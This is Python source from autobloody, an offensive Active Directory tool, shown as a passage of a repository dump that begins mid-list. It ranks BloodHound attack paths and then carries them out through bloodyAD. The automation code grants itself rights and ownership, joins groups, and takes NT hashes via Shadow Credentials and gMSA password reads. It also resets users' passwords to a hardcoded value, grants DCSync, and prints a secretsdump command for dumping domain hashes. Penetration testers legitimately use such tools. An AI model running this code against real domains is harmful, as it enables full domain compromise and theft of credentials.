            {"cost": 3, "edges": "WriteOwner", "endnode": "Domain"},
            {"cost": 10, "edges": "ReadGMSAPassword", "endnode": ""},
            {
                "cost": 100,
                "edges": "AddSelf|AddMember|GenericAll|GenericWrite|AllExtendedRights|Contains",
                "endnode": "Group",
            },
            {"cost": 200, "edges": "WriteDacl|Owns", "endnode": "Group"},
            {"cost": 300, "edges": "WriteOwner", "endnode": "Group"},
            # If we already have GenericAll right on OU we must ensure inheritance or we'll add a new GenericAll ACE with inheritance
            {"cost": 400, "edges": "Contains|GenericWrite|GenericAll", "endnode": "OU"},
            {"cost": 500, "edges": "WriteDacl|Owns", "endnode": "OU"},
            {"cost": 600, "edges": "WriteOwner", "endnode": "OU"},
            {"cost": 10000, "edges": "Contains|GenericWrite|GenericAll", "endnode": "GPO"},
            {"cost": 11000, "edges": "WriteDacl|Owns", "endnode": "GPO"},
            {"cost": 12000, "edges": "WriteOwner", "endnode": "GPO"},
            {
                "cost": 100000,
                "edges": "GenericWrite|GenericAll|AllExtendedRights|Contains",
                "endnode": "User",
            },
            {"cost": 100001, "edges": "WriteDacl|Owns", "endnode": "User"},
            {"cost": 100002, "edges": "WriteOwner", "endnode": "User"},
            # User and Computer end nodes deliberately share the same costs,
            # so they dispatch to the same exploitation handlers
            {
                "cost": 100000,
                "edges": "GenericWrite|GenericAll|AllExtendedRights|Contains",
                "endnode": "Computer",
            },
            {"cost": 100001, "edges": "WriteDacl|Owns", "endnode": "Computer"},
            {"cost": 100002, "edges": "WriteOwner", "endnode": "Computer"},
            {
                "cost": 110000,
                "edges": "ForceChangePassword",
                "endnode": "",
            },
        ]
        for bloodycost in bloodycosts:
            # Empty 'endnode' means the edge applies to any node label;
            # otherwise restrict the MATCH to that label
            endnode = ":" + bloodycost['endnode'] if bloodycost['endnode'] else ""
            tx.run(
                f"MATCH ()-[r:{bloodycost['edges']}]->({endnode}) SET"
                f" r.bloodycost = {bloodycost['cost']}"
            )

    @staticmethod
    def _createGraph(tx):
        """(Re)create the in-memory GDS graph projection named 'autobloody'.

        Drops any stale projection first. Relationships that were not tagged
        by _setWeight get a huge defaultValue for 'bloodycost' so Dijkstra
        effectively never selects them.

        :param tx: neo4j transaction object used to run the queries
        """
        graph_exists = tx.run("RETURN gds.graph.exists('autobloody')").single()[0]
        if graph_exists:
            tx.run("CALL gds.graph.drop('autobloody')")
        tx.run(
            "CALL gds.graph.project('autobloody','*',{all:{type:'*',"
            " properties:{bloodycost:{defaultValue:9999999999}}}},{validateRelationships:true})"
        )

    def _findShortestPath(self, tx, source, target):
        """Return the relationships of a path from *source* to *target*.

        :param tx: neo4j transaction object
        :param source: 'name' property of the start node (owned principal)
        :param target: 'name' property of the destination node
        :returns: the sequence of relationships composing the chosen path
        :raises ValueError: when no exploitable path is found

        # NOTE(review): self.gds_available is presumably set when the class
        # connects to Neo4j — its initialization is outside this chunk; confirm.
        """
        if self.gds_available:
            # Use GDS plugin for better performance
            result = (
                tx.run(
                    "MATCH (s {name:$source}) MATCH (t {name:$target}) CALL"
                    " gds.shortestPath.dijkstra.stream('autobloody',{sourceNode:s,"
                    " targetNode:t, relationshipWeightProperty:'bloodycost'})YIELD path"
                    " RETURN path",
                    source=source,
                    target=target,
                )
            ).single()
            if not result:
                raise ValueError("No path exploitable by autobloody found")
            return result[0].relationships
        else:
            # Use native CYPHER for shortest path (slower but doesn't require GDS)
            # This implementation uses built-in shortestPath with cost accumulation
            # Limited to 20 hops max to avoid performance issues
            # Only consider relationships that have bloodycost set (exploitable edges)
            # NOTE(review): Cypher's shortestPath() minimizes HOP COUNT, not
            # bloodycost — it returns a single fewest-hops path, so the
            # ORDER BY totalCost only ranks that one result. The fallback may
            # therefore pick a costlier path than the GDS Dijkstra branch;
            # confirm this approximation is acceptable when GDS is missing.
            result = tx.run(
                """
                MATCH path = shortestPath((start {name: $source})-[*..20]->(end {name: $target}))
                WHERE ALL(r IN relationships(path) WHERE r.bloodycost IS NOT NULL)
                WITH path, relationships(path) as rels
                WITH path, reduce(cost = 0, r in rels | cost + r.bloodycost) as totalCost
                RETURN path
                ORDER BY totalCost
                LIMIT 1
                """,
                source=source,
                target=target,
            ).single()

            if not result:
                raise ValueError("No path exploitable by autobloody found")
            return result[0].relationships
--------------------------------------------------------------------------------
/autobloody/automation.py:
--------------------------------------------------------------------------------
from bloodyAD import ConnectionHandler
from bloodyAD.cli_modules import add, set, remove, get
from badldap.commons.exceptions import LDAPModifyException
import logging, re, copy
# Constant for password changes
PASSWORD_DEFAULT = "AutoBl00dy123!"
LOG = logging.getLogger('autobloody')

class Automation:
    """Walks the path computed by the database module and exploits each edge.

    Each path relationship carries a 'cost' that doubles as a dispatch key
    into self.rel_types; exploitation can run for real (exploit) or be
    printed without touching the domain (simulate).
    """

    def __init__(self, args, path):
        """Store connection arguments and the path to exploit.

        :param args: argparse-style namespace with LDAP credentials/options
        :param path: ordered sequence of relationship dicts, each exposing
                     'cost', 'start_node' and 'end_node'
        """
        self.co_args = args
        self.path = path
        # Dispatch table: edge cost (assigned by database._setWeight) -> handler
        self.rel_types = {
            0: self._nextHop,
            1: self._dcSync,
            2: self._setDCSync,
            3: self._ownerDomain,
            10: self._readGMSAPassword,
            100: self._addMember,
            200: self._aclGroup,
            300: self._ownerGroup,
            400: self._genericAll,
            500: self._genericAll,
            600: self._ownerContainer,
            10000: self._genericAll,
            11000: self._genericAll,
            12000: self._ownerContainer,
            100000: self._shadowCredentialsOrForceChange,
            100001: self._aclPrincipal,
            100002: self._ownerPrincipal,
            110000: self._forceChangePassword,
        }
        # LIFO list of cleanup operations ({"f": callable, "args": [...]})
        # replayed by _washer to revert the changes made during exploitation
        self.dirty_laundry = []

    async def simulate(self):
        """Print the operations the path would trigger, without executing them."""
        self.simulation = True
        # Templates used by _printOperation, keyed by operation function name
        self.rel_str = {
            "setDCSync": "[Add DCSync right] to {}",
            "groupMember": "[Membership] on group {} for {}",
            "genericAll": "[GenericAll given] on {} to {}",
            "owner": "[Ownership Given] on {} to {}",
            "password": "[Change password] of {} to {}",
            "readGMSAPassword": "[Read GMSA Password] from {}",
            "shadowCredentials": "[Add Shadow Credentials] (if fails, fallback to password change) to {}",
        }
        print(f"\nAuthenticated as {self.co_args.username}:\n")
        await self._unfold()

    async def exploit(self):
        """Execute the exploitation path for real against the domain.

        Normalizes self.co_args in place to the shape bloodyAD 2.x expects
        before opening the first LDAP connection.
        """
        self.simulation = False
        # Add missing attributes for bloodyAD 2.x compatibility
        if not hasattr(self.co_args, 'gc'):
            self.co_args.gc = False
        if not hasattr(self.co_args, 'dc_ip'):
            self.co_args.dc_ip = ""
        if not hasattr(self.co_args, 'format'):
            self.co_args.format = ""
        if not hasattr(self.co_args, 'dns'):
            self.co_args.dns = ""
        # timeout is now passed from argparse, no need to set default here
        # Convert kerberos boolean to krb_args list format expected by bloodyAD 2.x
        # Empty list means kerberos is enabled, None means disabled
        if hasattr(self.co_args, 'kerberos') and self.co_args.kerberos:
            self.co_args.kerberos = []
        else:
            self.co_args.kerberos = None
        # Convert secure boolean to integer format expected by bloodyAD 2.x
        if hasattr(self.co_args, 'secure') and self.co_args.secure:
            self.co_args.secure = 1
        else:
            self.co_args.secure = 0

        self.conn = ConnectionHandler(self.co_args)
        await self._unfold()

    async def _unfold(self):
        """Dispatch every relationship of the path to its cost-keyed handler.

        On any failure, replays the cleanup list first, then re-raises.
        """
        for rel in self.path:
            if not self.simulation:
                print()
            typeID = rel["cost"]
            try:
                await self.rel_types[typeID](rel)
            except Exception as e:
                # Revert what has been changed so far before propagating
                await self._washer()
                # Quick fix for issue #5 remove it when dropping Neo4j dependency
                # (9999999999 is the defaultValue given to non-exploitable edges
                # in the graph projection)
                if typeID == 9999999999:
                    raise ValueError("The path you're trying to exploit is not exploitable by autobloody only, you may need other tools to exploit it. See #Limitations in the README")
                raise e

    async def _washer(self):
        """Replay dirty_laundry in reverse order to undo AD modifications."""
        if self.simulation:
            print()
        self.dirty_laundry.reverse()
        for laundry in self.dirty_laundry:
            if self.simulation:
                # revert=True prefixes the line with "[-] Revert"
                self._printOperation(laundry["f"].__name__, laundry["args"], True)
            else:
                await laundry["f"](self.conn, *laundry["args"])
        self.dirty_laundry = []

    async def _switchUser(self, user, pwd, dom=None):
        """Re-authenticate as *user* after cleaning up pending changes.

        :param user: account name to authenticate as
        :param pwd: password, or ":nthash" for NTLM pass-the-hash
        :param dom: optional domain override for the new connection
        """
        # Clean up before dropping the current identity: the reverts need
        # the privileges of the user who made the changes
        await self._washer()
        if self.simulation:
            print(f"\nAuthenticated as {user}:\n")
        else:
            # Close current connection
            await self.conn.closeLdap()

            # Create new args for the new user
            new_args = copy.copy(self.co_args)
            new_args.username = user
            new_args.password = pwd
            if dom:
                new_args.domain = dom

            # Clear old credentials to avoid mixing credential types
            new_args.certificate = None
            new_args.kerberos = None

            # Create new ConnectionHandler with new credentials
            self.conn = ConnectionHandler(new_args)

    async def _nextHop(self, rel):
        # Cost-0 edges (MemberOf) need no action: the right is already held
        return

    async def _dcSync(self, rel):
        """Terminal edge: DCSync right already held, tell the user how to use it."""
        if not self.simulation:
            print(
                "[+] You can now dump the NTDS using: secretsdump.py"
                f" '{self.conn.conf.domain}/{self.conn.conf.username}:{self.conn.conf.password}@{self.conn.conf.host}'"
            )

    async def _setDCSync(self, rel):
        """Grant the DCSync right to the path's start node."""
        operation = add.setDCSync
        if self.simulation:
            user = rel["start_node"]["name"]
            self._printOperation(operation.__name__, [user])
        else:
            user = rel["start_node"]["distinguishedname"]
            await operation(self.conn, user)

    async def _ownerDomain(self, rel):
        """WriteOwner on the domain: take ownership, then grant DCSync."""
        await self._setOwner(rel)
        await self._setDCSync(rel)

    async def _addMember(self, rel):
        """Add the start node to the end-node group; schedule removal on cleanup."""
        add_operation = add.groupMember
        member = rel["start_node"]["name"]
        group = rel["end_node"]["name"]
        if self.simulation:
            self._printOperation(add_operation.__name__, [group, member])
        else:
            member_sid = rel["start_node"]["objectid"]
            group_dn = rel["end_node"]["distinguishedname"]
            try:
                await add_operation(self.conn, group_dn, member_sid)
                # Close connection to apply changes
                await self.conn.closeLdap()
                self.dirty_laundry.append({"f": remove.groupMember, "args": [group_dn, member_sid]})
            except LDAPModifyException as e:
                # Check if it's an entryAlreadyExists error
                # (LDAP result code 68 = entryAlreadyExists)
                if e.resultcode == 68:
                    LOG.warning(f"{member} already in {group}, continuing exploitation...")
                else:
                    raise e

    async def _aclGroup(self, rel):
        """WriteDacl/Owns on a group: grant GenericAll, then join the group."""
        await self._genericAll(rel)
        await self._addMember(rel)

    async def _ownerGroup(self, rel):
        """WriteOwner on a group: take ownership, then proceed as _aclGroup."""
        await self._setOwner(rel)
        await self._aclGroup(rel)

    async def _aclPrincipal(self, rel):
        """WriteDacl/Owns on a user/computer: grant GenericAll, then take it over."""
        await self._genericAll(rel)
        await self._shadowCredentialsOrForceChange(rel)

    async def _ownerPrincipal(self, rel):
        """WriteOwner on a user/computer: take ownership, then proceed as _aclPrincipal."""
        await self._setOwner(rel)
        await self._aclPrincipal(rel)

| async def _ownerContainer(self, rel): 184 | await self._setOwner(rel) 185 | await self._genericAll(rel) 186 | 187 | async def _shadowCredentialsOrForceChange(self, rel): 188 | """ 189 | Try to use shadowCredentials first, fall back to forceChangePassword if not possible 190 | """ 191 | shadow_operation = add.shadowCredentials 192 | if self.simulation: 193 | target = rel["end_node"]["name"] 194 | self._printOperation(shadow_operation.__name__, [target]) 195 | else: 196 | target = rel["end_node"]["samaccountname"] 197 | target_dn = rel["end_node"]["distinguishedname"] 198 | 199 | # Try shadowCredentials 200 | LOG.debug("Attempting shadowCredentials attack") 201 | try: 202 | key_matches, result = await extractFromLogs(r'key: (\S+)', shadow_operation, self.conn, target_dn) 203 | # Retrieve all the groups of the first key match from logged output 204 | key_groups = key_matches[0].groups() if key_matches else None 205 | key = None 206 | # If we have key groups, extract the key 207 | if key_groups: 208 | key = key_groups[0] 209 | else: 210 | LOG.warning("Could not extract key from shadowCredentials logs, key won't be removed after exploit") 211 | 212 | pwd = ":" + result[0]['NT'] 213 | print(f"Successfully obtained NT hash of {target} via shadowCredentials: {result[0]['NT']}") 214 | # Pass NT hash in the format ":nt_hash" for NTLM authentication 215 | LOG.info(f"Switching to user: {target}") 216 | self.dirty_laundry.append({"f": remove.shadowCredentials, "args": [target_dn, key]}) 217 | await self._switchUser(target, pwd, dom=rel["end_node"]["domain"]) 218 | except Exception as e: 219 | # If shadowCredentials fails, fall back to forceChangePassword 220 | LOG.warning(f"shadowCredentials failed: {e}, falling back to forceChangePassword") 221 | await self._forceChangePassword(rel) 222 | 223 | # ForceChangePassword edge directly changes the password 224 | async def _forceChangePassword(self, rel): 225 | pwd = PASSWORD_DEFAULT 226 | pwd_operation = set.password 227 | if 
self.simulation: 228 | user = rel["end_node"]["name"] 229 | self._printOperation(pwd_operation.__name__, [user, pwd]) 230 | else: 231 | user_dn = rel["end_node"]["distinguishedname"] 232 | await pwd_operation(self.conn, user_dn, pwd) 233 | user = rel["end_node"]["samaccountname"] 234 | LOG.info(f"switching to LDAP connection for user {user}") 235 | await self._switchUser(user, pwd, dom=rel["end_node"]["domain"]) 236 | 237 | async def _genericAll(self, rel): 238 | add_operation = add.genericAll 239 | if self.simulation: 240 | user = rel["start_node"]["name"] 241 | target = rel["end_node"]["name"] 242 | self._printOperation(add_operation.__name__, [target, user]) 243 | else: 244 | user = rel["start_node"]["distinguishedname"] 245 | target = rel["end_node"]["distinguishedname"] 246 | await add_operation(self.conn, target, user) 247 | self.dirty_laundry.append({"f": remove.genericAll, "args": [target, user]}) 248 | 249 | async def _setOwner(self, rel): 250 | operation = set.owner 251 | if self.simulation: 252 | user = rel["start_node"]["name"] 253 | target = rel["end_node"]["name"] 254 | self._printOperation(operation.__name__, [target, user]) 255 | else: 256 | user = rel["start_node"]["distinguishedname"] 257 | target = rel["end_node"]["distinguishedname"] 258 | await operation(self.conn, target, user) 259 | 260 | async def _readGMSAPassword(self, rel): 261 | """Exploit ReadGMSAPassword edge to retrieve GMSA password""" 262 | if self.simulation: 263 | target = rel["end_node"]["name"] 264 | self._printOperation("readGMSAPassword", [target]) 265 | else: 266 | target = rel["end_node"]["samaccountname"] 267 | target_dn = rel["end_node"]["distinguishedname"] 268 | 269 | # Read msDS-ManagedPassword attribute from the GMSA account 270 | # This returns a list with one dictionary like [{'NT': 'hash', 'B64ENCODED': 'base64string'}] 271 | nthash = None 272 | async for entry in get.object(self.conn, target_dn, attr="msDS-ManagedPassword"): 273 | if "msDS-ManagedPassword" in 
entry: 274 | nthash = entry["msDS-ManagedPassword"][0]['NT'] 275 | break 276 | 277 | if nthash: 278 | print(f"From {target}, retrieved GMSA NT hash: {nthash}") 279 | # Pass NT hash in the format ":nt_hash" for NTLM authentication 280 | pwd = ":"+nthash 281 | LOG.info(f"Switching to GMSA account: {target}") 282 | await self._switchUser(target, pwd, dom=rel["end_node"]["domain"]) 283 | else: 284 | raise ValueError("Failed to retrieve GMSA password") 285 | 286 | 287 | def _printOperation(self, operation_name, operation_args, revert=False): 288 | operation_str = "\t" 289 | if revert: 290 | operation_str += "[-] Revert " 291 | else: 292 | operation_str += "[+] " 293 | 294 | operation_str += self.rel_str[operation_name] 295 | arg_nb = operation_str.count("{") 296 | print(operation_str.format(*operation_args[:arg_nb])) 297 | 298 | 299 | 300 | # Utilities 301 | class Grabber(logging.Handler): 302 | def __init__(self, pattern): 303 | super().__init__() 304 | self.matches = [] 305 | self.pattern = pattern 306 | 307 | def emit(self, record: logging.LogRecord): 308 | msg = record.getMessage() 309 | m = re.search(self.pattern, msg) 310 | if m: 311 | self.matches.append(m) 312 | 313 | async def extractFromLogs(pattern, function, *args, **kwargs): 314 | logger = logging.getLogger('bloodyAD') 315 | logger.setLevel(logging.INFO) 316 | grabber = Grabber(pattern) 317 | logger.addHandler(grabber) 318 | try: 319 | results = await function(*args, **kwargs) 320 | finally: 321 | logger.removeHandler(grabber) 322 | return (grabber.matches, results) --------------------------------------------------------------------------------